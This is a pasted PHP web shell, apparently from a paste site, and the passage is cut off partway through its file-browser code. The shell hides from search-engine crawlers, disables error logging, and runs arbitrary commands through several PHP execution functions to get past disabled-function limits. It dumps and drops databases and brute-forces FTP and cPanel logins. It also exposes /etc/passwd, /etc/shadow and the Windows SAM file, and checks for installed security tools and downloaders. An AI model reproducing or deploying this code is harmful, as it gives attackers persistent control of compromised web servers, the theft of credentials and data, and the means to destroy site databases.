

Jan 28th, 2016
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  1. <?php
  2. @set_magic_quotes_runtime(0);
  3. @ini_set('error_log',NULL);
  4. @ini_set('log_errors',0);
  5. ob_start();
  6. error_reporting(0);
  7. @set_time_limit(0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  11. if(!empty($_SERVER['HTTP_USER_AGENT']))
  12. {
  13. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  14. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  15. header('HTTP/1.0 404 Not Found');
  16. exit; }
  17. }
  18. // Dump Database
  19. if($_GET["action"] == "dumpDB")
  20. {
  21. $self=$_SERVER["PHP_SELF"];
  22. if(isset($_COOKIE['dbserver']))
  23. {
  24. $date = date("Y-m-d");
  25. $dbserver = $_COOKIE["dbserver"];
  26. $dbuser = $_COOKIE["dbuser"];
  27. $dbpass = $_COOKIE["dbpass"];
  28. $dbname = $_GET['dbname'];
  29. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  31. $file = "Dump-$dbname-$date";
  33. $file="Dump-$dbname-$date.sql";
  34. $fp = fopen($file,"w");
  36. function write($data)
  37. {
  38. global $fp;
  40. fwrite($fp,$data);
  42. }
  43. mysql_connect ($dbserver, $dbuser, $dbpass);
  44. mysql_select_db($dbname);
  45. $tables = mysql_query ("SHOW TABLES");
  46. while ($i = mysql_fetch_array($tables))
  47. {
  48. $i = $i['Tables_in_'.$dbname];
  49. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  50. write($create['Create Table'].";");
  51. $sql = mysql_query ("SELECT * FROM ".$i);
  52. if (mysql_num_rows($sql)) {
  53. while ($row = mysql_fetch_row($sql)) {
  54. foreach ($row as $j => $k) {
  55. $row[$j] = "'".mysql_escape_string($k)."'";
  56. }
  57. write("INSERT INTO $i VALUES(".implode(",", $row).");");
  58. }
  59. }
  60. }
  62. fclose ($fp);
  64. header("Content-Disposition: attachment; filename=" . $file);
  65. header("Content-Type: application/download");
  66. header("Content-Length: " . filesize($file));
  67. flush();
  69. $fp = fopen($file, "r");
  70. while (!feof($fp))
  71. {
  72. echo fread($fp, 65536);
  73. flush();
  74. }
  75. fclose($fp);
  76. }
  77. }
  78. function shellstyle()
  79. {
  80. echo "<style type=\"text/css\">
  81. <!--
  83. body,td,th {
  84. color: #FF0000;
  85. font-size: 14px;
  86. }
  87. input.but {
  88. background-color:#000000;
  89. color:#FF0000;
  90. border : 1px solid #1B1B1B;
  91. }
  92. a:link {
  93. color: #00FF00;
  94. text-decoration:none;
  95. font-weight:500;
  96. }
  97. a:hover {
  98. color:#00FF00;
  99. text-decoration:underline;
  100. }
  101. font.txt
  102. {
  103. color: #00FF00;
  104. text-decoration:none;
  105. font-size:14px;
  106. }
  107. font.mainmenu
  108. {
  109. color:#FF0000;
  110. text-decoration:none;
  111. font-size:14px;
  112. }
  113. a:visited {
  114. color: #006600;
  115. }
  117. {
  118. background-color:#0C0C0C;
  119. color: lime;
  120. border : 1px solid #1B1B1B;
  121. -moz-border-radius:6px;
  122. width:400;
  123. border-radius:6px;
  124. }
  125. input.sbox
  126. {
  127. background-color:#0C0C0C;
  128. color: lime;
  129. border : 1px solid #1B1B1B;
  130. -moz-border-radius:6px;
  131. width:180;
  132. border-radius:6px;
  133. }
  134. select.sbox
  135. {
  136. background-color:#0C0C0C;
  137. color: lime;
  138. border : 1px solid #1B1B1B;
  139. -moz-border-radius:6px;
  140. width:180;
  141. border-radius:6px;
  142. }
  144. {
  145. background-color:#0C0C0C;
  146. color: lime;
  147. border : 1px solid #1B1B1B;
  148. -moz-border-radius:6px;
  149. width:400;
  150. border-radius:6px;
  151. }
  154. {
  155. border : 3px solid #111;
  156. background-color:#161616;
  157. color : lime;
  158. margin-top: 10px;
  159. -moz-border-radius:7px;
  160. border-radius:7px;
  161. }
  162. body {
  163. background-color:#000000;
  164. }
  165. .myphp table
  166. {
  167. width:100%;
  168. padding:18px 10px;
  169. border : 1px solid #1B1B1B;
  170. }
  171. .myphp td
  172. {
  173. background:#111111;
  174. color:#00ff00;
  175. padding:6px 8px;
  176. border-bottom:1px solid #222222;
  177. font-size:14px;
  178. }
  179. .myphp th, th
  180. {
  181. background:#181818;
  183. }
  184. -->
  185. </style>";
  186. }
  187. if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
  188. {
  189. $self=$_SERVER["PHP_SELF"];
  190. $os = "N/D";
  191. $bdmessage = null;
  192. $dir = getcwd();
  194. if(stristr(php_uname(),"Windows"))
  195. {
  196. $SEPARATOR = '\\';
  197. $os = "Windows";
  198. $directorysperator="\\";
  199. }
  200. else if(stristr(php_uname(),"Linux"))
  201. {
  202. $os = "Linux";
  203. $directorysperator='/';
  204. }
  205. function Trail($d,$directsperator)
  206. {
  207. $d=explode($directsperator,$d);
  208. array_pop($d);
  209. array_pop($d);
  210. $str=implode($d,$directsperator);
  211. return $str;
  212. }
  214. function ftp_check($host,$user,$pass,$timeout)
  215. {
  216. $ch = curl_init();
  217. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  218. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  219. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  220. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  221. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  222. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  223. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  224. $data = curl_exec($ch);
  225. if ( curl_errno($ch) == 28 )
  226. {
  227. print "<center><b>
  228. Error : Connection Timeout.
  229. Please Check The Target Hostname .</b></center>";exit;
  230. }
  231. else if ( curl_errno($ch) == 0 )
  232. {
  233. print "<center><b>[~]</b><font class=txt>
  234. Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  235. and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
  236. }
  237. curl_close($ch);
  238. }
  240. function cpanel_check($host,$user,$pass,$timeout)
  241. {
  242. global $cpanel_port;
  243. $ch = curl_init();
  244. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  245. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  246. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  247. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  248. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  249. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  250. $data = curl_exec($ch);
  251. if ( curl_errno($ch) == 28 )
  252. { print "<center><b>Error : Connection Timeout.
  253. Please Check The Target Hostname.</b></center>";exit;}
  254. else if ( curl_errno($ch) == 0 ){
  255. print "<ecnter><b>[~]</b><font class=txt><b>
  257. Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  258. and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
  259. }
  260. curl_close($ch);
  261. }
  263. // Database functions
  264. function listdatabase()
  265. {
  266. $self=$_SERVER["PHP_SELF"];
  267. ?>
  268. <br>
  269. <form>
  270. <table>
  271. <tr>
  272. <td><input type="text" class="box" name="dbname"></td>
  273. <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
  274. </tr>
  275. </table>
  276. </form>
  277. <br>
  278. <?php
  279. $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
  280. $result = mysql_query("SHOW DATABASE");
  281. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
  283. $pDB = mysql_list_dbs( $mysqlHandle );
  284. $num = mysql_num_rows( $pDB );
  285. for( $i = 0; $i < $num; $i++ )
  286. {
  287. $dbname = mysql_dbname( $pDB, $i );
  288. mysql_select_db($dbname,$mysqlHandle);
  289. $result = mysql_query("SHOW TABLES");
  290. $num_of_tables = mysql_num_rows($result);
  291. echo "<tr>\n";
  292. echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
  293. echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
  294. echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
  295. echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
  296. echo "</tr>\n";
  297. }
  298. echo "</table>\n";
  299. mysql_close($mysqlHandle);
  300. }
  302. function listtable()
  303. {
  304. $self=$_SERVER["PHP_SELF"];
  305. $dbserver = $_COOKIE["dbserver"];
  306. $dbuser = $_COOKIE["dbuser"];
  307. $dbpass = $_COOKIE["dbpass"];
  308. $dbname = $_GET['dbname'];
  309. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  310. ?>
  311. <br><br>
  312. <form>
  313. <table>
  315. <tr>
  316. <td><input type="text" class="box" name="tablename"></td>
  317. <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
  318. </tr>
  319. </table>
  321. <br>
  322. <form>
  323. <table>
  324. <tr>
  325. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
  326. </tr>
  327. <tr>
  328. <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
  329. </tr>
  330. </table>
  331. </form>
  333. <?php
  335. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  337. mysql_select_db($dbname);
  338. $pTable = mysql_list_tables( $dbname );
  340. if( $pTable == 0 ) {
  341. $msg = mysql_error();
  342. echo "<h3>Error : $msg</h3><p>\n";
  343. return;
  344. }
  345. $num = mysql_num_rows( $pTable );
  347. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
  349. for( $i = 0; $i < $num; $i++ )
  350. {
  351. $tablename = mysql_tablename( $pTable, $i );
  352. $result = mysql_query("select * from $tablename");
  353. $num_rows = mysql_num_rows($result);
  354. echo "<tr>\n";
  355. echo "<td>\n";
  356. echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
  357. echo "</td>\n";
  358. echo "<td>\n";
  359. echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
  360. echo "</td>\n";
  361. echo "<td>\n";
  362. echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
  363. echo "</td>\n";
  364. echo "<td>\n";
  365. echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
  366. echo "</td>\n";
  367. echo "<td>\n";
  368. echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
  369. echo "</td>\n";
  370. echo "</tr>\n";
  371. }
  373. echo "</table></form>";
  374. mysql_close($mysqlHandle);
  375. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  376. }
  379. function paramexe($n, $v)
  380. {
  381. $v = trim($v);
  382. if($v)
  383. {
  384. echo '<span><font size=3>' . $n . ': </font></span>';
  385. if(strpos($v, "\n") === false)
  386. echo '<font size=2>' . $v . '</font><br>';
  387. else
  388. echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
  389. }
  390. }
  394. function rrmdir($dir)
  395. {
  396. if (is_dir($dir)) // ensures that we actually have a directory
  397. {
  398. $objects = scandir($dir); // gets all files and folders inside
  399. foreach ($objects as $object)
  400. {
  401. if ($object != '.' && $object != '..')
  402. {
  403. if (is_dir($dir . '/' . $object))
  404. {
  405. // if we find a directory, do a recursive call
  406. rrmdir($dir . '/' . $object);
  407. }
  408. else
  409. {
  410. // if we find a file, simply delete it
  411. unlink($dir . '/' . $object);
  412. }
  413. }
  414. }
  415. // the original directory is now empty, so delete it
  416. rmdir($dir);
  417. }
  418. }
  420. function which($pr)
  421. {
  422. $path = execmd("which $pr");
  423. if(!empty($path))
  424. return trim($path);
  425. else
  426. return trim($pr);
  427. }
  429. function magicboom($text)
  430. {
  431. if (!get_magic_quotes_gpc())
  432. return $text;
  433. return stripslashes($text);
  434. }
  436. function execmd($cmd,$d_functions="None")
  437. {
  438. if($d_functions=="None")
  439. {
  440. $ret=passthru($cmd);
  441. return $ret;
  442. }
  443. $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
  444. $d_functions=str_replace(" ","",$d_functions);
  445. $dis_funcs=explode(",",$d_functions);
  446. foreach($funcs as $safe)
  447. {
  448. if(!in_array($safe,$dis_funcs))
  449. {
  450. if($safe=="exec")
  451. {
  452. $ret=@exec($cmd);
  453. $ret=join("\n",$ret);
  454. return $ret;
  455. }
  456. elseif($safe=="system")
  457. {
  458. $ret=@system($cmd);
  459. return $ret;
  460. }
  461. elseif($safe=="passthru")
  462. {
  463. $ret=@passthru($cmd);
  464. return $ret;
  465. }
  466. elseif($safe=="shell_exec")
  467. {
  468. $ret=@shell_exec($cmd);
  469. return $ret;
  470. }
  471. elseif($safe=="popen")
  472. {
  473. $ret=@popen("$cmd",'r');
  474. if(is_resource($ret))
  475. {
  476. while(@!feof($ret))
  477. $read.=@fgets($ret);
  478. @pclose($ret);
  479. return $read;
  480. }
  481. return -1;
  482. }
  483. elseif($safe="proc_open")
  484. {
  485. $cmdpipe=array(
  486. 0=>array('pipe','r'),
  487. 1=>array('pipe','w')
  488. );
  489. $resource=@proc_open($cmd,$cmdpipe,$pipes);
  490. if(@is_resource($resource))
  491. {
  492. while(@!feof($pipes[1]))
  493. $ret.=@fgets($pipes[1]);
  494. @fclose($pipes[1]);
  495. @proc_close($resource);
  496. return $ret;
  497. }
  498. return -1;
  499. }
  500. }
  501. }
  502. return -1;
  503. }
  505. function getDisabledFunctions()
  506. {
  507. if(!ini_get('disable_functions'))
  508. {
  509. return "None";
  510. }
  511. else
  512. {
  513. return @ini_get('disable_functions');
  514. }
  515. }
  517. function getFilePermissions($file)
  518. {
  519. $perms = fileperms($file);
  521. if (($perms & 0xC000) == 0xC000) {
  522. // Socket
  523. $info = 's';
  524. } elseif (($perms & 0xA000) == 0xA000) {
  525. // Symbolic Link
  526. $info = 'l';
  527. } elseif (($perms & 0x8000) == 0x8000) {
  528. // Regular
  529. $info = '-';
  530. } elseif (($perms & 0x6000) == 0x6000) {
  531. // Block special
  532. $info = 'b';
  533. } elseif (($perms & 0x4000) == 0x4000) {
  534. // Directory
  535. $info = 'd';
  536. } elseif (($perms & 0x2000) == 0x2000) {
  537. // Character special
  538. $info = 'c';
  539. } elseif (($perms & 0x1000) == 0x1000) {
  540. // FIFO pipe
  541. $info = 'p';
  542. } else {
  543. // Unknown
  544. $info = 'u';
  545. }
  547. // Owner
  548. $info .= (($perms & 0x0100) ? 'r' : '-');
  549. $info .= (($perms & 0x0080) ? 'w' : '-');
  550. $info .= (($perms & 0x0040) ?
  551. (($perms & 0x0800) ? 's' : 'x' ) :
  552. (($perms & 0x0800) ? 'S' : '-'));
  554. // Group
  555. $info .= (($perms & 0x0020) ? 'r' : '-');
  556. $info .= (($perms & 0x0010) ? 'w' : '-');
  557. $info .= (($perms & 0x0008) ?
  558. (($perms & 0x0400) ? 's' : 'x' ) :
  559. (($perms & 0x0400) ? 'S' : '-'));
  561. // World
  562. $info .= (($perms & 0x0004) ? 'r' : '-');
  563. $info .= (($perms & 0x0002) ? 'w' : '-');
  564. $info .= (($perms & 0x0001) ?
  565. (($perms & 0x0200) ? 't' : 'x' ) :
  566. (($perms & 0x0200) ? 'T' : '-'));
  568. return $info;
  569. }
  570. function filepermscolor($filename)
  571. {
  572. if(!@is_readable($filename))
  573. return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
  574. else if(!@is_writable($filename))
  575. return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
  576. else
  577. return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
  578. }
  580. function yourip()
  581. {
  582. echo $_SERVER["REMOTE_ADDR"];
  583. }
  584. function phpver()
  585. {
  586. $pv=@phpversion();
  587. echo $pv;
  588. }
  589. function magic_quote()
  590. {
  591. echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
  592. }
  593. function serverip()
  594. {
  595. echo getenv('SERVER_ADDR');
  596. }
  597. function serverport()
  598. {
  599. echo $_SERVER['SERVER_PORT'];
  600. }
  601. function safe()
  602. {
  603. global $sm;
  604. return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
  605. }
  606. function serveradmin()
  607. {
  608. echo $_SERVER['SERVER_ADMIN'];
  609. }
  610. function systeminfo()
  611. {
  612. echo php_uname();
  613. }
  614. function curlinfo()
  615. {
  616. echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
  617. }
  618. function oracleinfo()
  619. {
  620. echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
  621. }
  622. function mysqlinfo()
  623. {
  624. echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
  625. }
  626. function mssqlinfo()
  627. {
  628. echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
  629. }
  630. function postgresqlinfo()
  631. {
  632. echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
  633. }
  634. function softwareinfo()
  635. {
  636. echo getenv("SERVER_SOFTWARE");
  637. }
  638. function download()
  639. {
  640. $frd=$_GET['download'];
  641. $prd=explode("/",$frd);
  642. for($i=0;$i<sizeof($prd);$i++)
  643. {
  644. $nfd=$prd[$i];
  645. }
  646. @ob_clean();
  647. header("Content-type: application/octet-stream");
  648. header("Content-length: ".filesize($nfd));
  649. header("Content-disposition: attachment; filename=\"".$nfd."\";");
  650. readfile($nfd);
  652. exit;
  654. }
  656. function HumanReadableFilesize($size)
  657. {
  658. $mod = 1024;
  659. $units = explode(' ','B KB MB GB TB PB');
  660. for ($i = 0; $size > $mod; $i++)
  661. {
  662. $size /= $mod;
  663. }
  664. return round($size, 2) . ' ' . $units[$i];
  665. }
  667. function showDrives()
  668. {
  669. global $self;
  670. foreach(range('A','Z') as $drive)
  671. {
  672. if(is_dir($drive.':\\'))
  673. {
  674. $myd = $drive.":\\";
  675. ?>
  676. <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
  677. <?php echo $myd; ?>
  678. </a>
  679. <?php
  680. }
  681. }
  682. }
  683. function diskSpace()
  684. {
  685. return disk_total_space("/");
  686. }
  687. function freeSpace()
  688. {
  689. return disk_free_space("/");
  690. }
  692. function thiscmd($p)
  693. {
  694. $path = myexe('which ' . $p);
  695. if(!empty($path))
  696. return $path;
  697. return false;
  698. }
  700. function mysecinfo()
  701. {
  702. function myparam($n, $v)
  703. {
  704. $v = trim($v);
  705. if($v)
  706. {
  707. echo '<span><font color =red size=3>' . $n . ': </font></span>';
  708. if(strpos($v, "\n") === false)
  709. echo '<font color =lime size=3>' . $v . '</font><br>';
  710. else
  711. echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
  712. }
  713. }
  715. myparam('Server software', @getenv('SERVER_SOFTWARE'));
  716. if(function_exists('apache_get_modules'))
  717. myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
  718. myparam('Open base dir', @ini_get('open_basedir'));
  719. myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  720. myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  721. $temp=array();
  722. if(function_exists('mysql_get_client_info'))
  723. $temp[] = "MySql (".mysql_get_client_info().")";
  724. if(function_exists('mssql_connect'))
  725. $temp[] = "MSSQL";
  726. if(function_exists('pg_connect'))
  727. $temp[] = "PostgreSQL";
  728. if(function_exists('oci_connect'))
  729. $temp[] = "Oracle";
  730. myparam('Supported databases', implode(', ', $temp));
  731. echo '<br>';
  733. if($GLOBALS['os'] == 'Linux') {
  734. myparam('Distro : ', myexe("cat /etc/*-release"));
  735. myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
  736. myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
  737. myparam('OS version', @file_get_contents('/proc/version'));
  738. myparam('Distr name', @file_get_contents('/etc/'));
  739. myparam('Where is Perl?', myexe('whereis perl'));
  740. myparam('Where is Python?', myexe('whereis python'));
  741. myparam('Where is gcc?', myexe('whereis gcc'));
  742. myparam('Where is apache?', myexe('whereis apache'));
  743. myparam('CPU?', myexe('cat /proc/cpuinfo'));
  744. myparam('RAM', myexe('free -m'));
  745. myparam('Mount options', myexe('cat /etc/fstab'));
  746. myparam('User Limits', myexe('ulimit -a'));
  749. if(!$GLOBALS['safe_mode']) {
  750. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  751. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  752. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  753. echo '<br>';
  754. $temp=array();
  755. foreach ($userful as $item)
  756. if(thiscmd($item))
  757. $temp[] = $item;
  758. myparam('Userful', implode(', ',$temp));
  759. $temp=array();
  760. foreach ($danger as $item)
  761. if(thiscmd($item))
  762. $temp[] = $item;
  763. myparam('Danger', implode(', ',$temp));
  764. $temp=array();
  765. foreach ($downloaders as $item)
  766. if(thiscmd($item))
  767. $temp[] = $item;
  768. myparam('Downloaders', implode(', ',$temp));
  769. echo '<br/>';
  770. myparam('HDD space', myexe('df -h'));
  771. myparam('Hosts', @file_get_contents('/etc/hosts'));
  773. }
  774. } else {
  775. $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
  776. $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
  777. $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
  778. $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
  779. echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
  780. echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> &nbsp;<a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> &nbsp;<a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
  781. $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
  782. echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
  783. myparam('OS Version',myexe('ver'));
  784. myparam('Account Settings',myexe('net accounts'));
  785. myparam('User Accounts',myexe('net user'));
  786. }
  787. echo '</div>';
  788. }
  792. function myexe($in)
  793. {
  794. $out = '';
  795. if (function_exists('exec')) {
  796. @exec($in,$out);
  797. $out = @join("\n",$out);
  798. } elseif (function_exists('passthru')) {
  799. ob_start();
  800. @passthru($in);
  801. $out = ob_get_clean();
  802. } elseif (function_exists('system')) {
  803. ob_start();
  804. @system($in);
  805. $out = ob_get_clean();
  806. } elseif (function_exists('shell_exec')) {
  807. $out = shell_exec($in);
  808. } elseif (is_resource($f = @popen($in,"r"))) {
  809. $out = "";
  810. while(!@feof($f))
  811. $out .= fread($f,1024);
  812. pclose($f);
  813. }
  814. return $out;
  815. }
  817. function exec_all($command)
  818. {
  820. $output = '';
  821. if(function_exists('exec'))
  822. {
  823. exec($command,$output);
  824. $output = join("\n",$output);
  825. }
  827. else if(function_exists('shell_exec'))
  828. {
  829. $output = shell_exec($command);
  830. }
  832. else if(function_exists('popen'))
  833. {
  834. $handle = popen($command , "r"); // Open the command pipe for reading
  835. if(is_resource($handle))
  836. {
  837. if(function_exists('fread') && function_exists('feof'))
  838. {
  839. while(!feof($handle))
  840. {
  841. $output .= fread($handle, 512);
  842. }
  843. }
  844. else if(function_exists('fgets') && function_exists('feof'))
  845. {
  846. while(!feof($handle))
  847. {
  848. $output .= fgets($handle,512);
  849. }
  853. }
  854. }
  855. pclose($handle);
  856. }
  859. else if(function_exists('system'))
  860. {
  861. ob_start(); //start output buffering
  862. system($command);
  863. $output = ob_get_contents(); // Get the ouput
  864. ob_end_clean(); // Stop output buffering
  865. }
  867. else if(function_exists('passthru'))
  868. {
  869. ob_start(); //start output buffering
  870. passthru($command);
  871. $output = ob_get_contents(); // Get the ouput
  872. ob_end_clean(); // Stop output buffering
  873. }
  875. else if(function_exists('proc_open'))
  876. {
  877. $descriptorspec = array(
  878. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  879. );
  880. $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
  881. if(is_resource($handle))
  882. {
  883. if(function_exists('fread') && function_exists('feof'))
  884. {
  885. while(!feof($pipes[1]))
  886. {
  887. $output .= fread($pipes[1], 512);
  888. }
  889. }
  890. else if(function_exists('fgets') && function_exists('feof'))
  891. {
  892. while(!feof($pipes[1]))
  893. {
  894. $output .= fgets($pipes[1],512);
  895. }
  896. }
  897. }
  898. pclose($handle);
  899. }
  901. return(htmlspecialchars($output));
  903. }
  905. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
  906. $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
  908. function getOGid($value)
  909. {
  910. if(!function_exists('posix_getegid')) {
  911. $user = @get_current_user();
  912. $uid = @getmyuid();
  913. $gid = @getmygid();
  914. $group = "?";
  915. $owner = $uid . "/". $gid;
  916. return $owner;
  917. } else {
  918. $name=@posix_getpwuid(@fileowner($value));
  919. $group=@posix_getgrgid(@filegroup($value));
  920. $owner = $name['name']. " / ". $group['name'];
  921. return $owner;
  922. }
  923. }
  925. function mainfun($dir)
  926. {
  927. global $ind, $directorysperator,$os;
  929. $mydir = basename(dirname(__FILE__));
  930. $pdir = str_replace($mydir,"",$dir);
  931. $pdir = str_replace("/","",$dir);
  933. $files = array();
  934. $dirs = array();
  936. $odir=opendir($dir);
  937. while($file = readdir($odir))
  938. {
  939. if(is_dir($dir.'/'.$file))
  940. {
  941. $dirs[]=$file;
  942. }
  943. else
  944. {
  945. $files[]=$file;
  946. }
  947. }
  948. $countfiles = count($dirs) + count($files);
  949. $dircount = count($dirs);
  950. $dircount = $dircount-2;
  951. $myfiles = array_merge($dirs,$files);
  952. $i = 0;
  953. if(is_dir($dir))
  954. {
  955. if(scandir($dir) === false)
  956. echo "<center><font size=3>Directory isn't readable</font></center>";
  957. else
  958. {
  959. ?><form method="post" id="myform" name="myform">
  960. <table id="maintable" style="width:100%;" align="center" cellpadding="3">
  961. <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
  962. <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
  963. <tr style="background-color:#0C0C0C; height:12px;">
  964. <th>Name</th>
  965. <th>Size</th>
  966. <th>Permissions</th>
  967. <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
  968. <th>Modification Date</th>
  969. <th>Rename</th>
  970. <th>Download</th>
  971. <th style="width:2%;">Action</th>
  972. </tr>
  973. <?php
  974. foreach($myfiles as $val)
  975. {
  976. $vv = addslashes($dir . $directorysperator . $val);
  977. $i++;
  979. if($val == ".")
  980. {
  982. ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
  983. <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
  985. <?php if($os != 'Windows')
  986. {
  987. echo "<td align=center><font size=2>";
  988. echo getOGid($dir)."</font></td>";
  989. }
  990. ?>
  992. <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
  993. <td></td><td></td><td></td></</tr><?php
  995. }
  996. else if($val == "..")
  997. {
  998. $val = Trail($dir . $directorysperator . $val,$directorysperator);
  999. $vv = addslashes($val);
  1000. if(empty($vv))
  1001. $vv = "/"; ?>
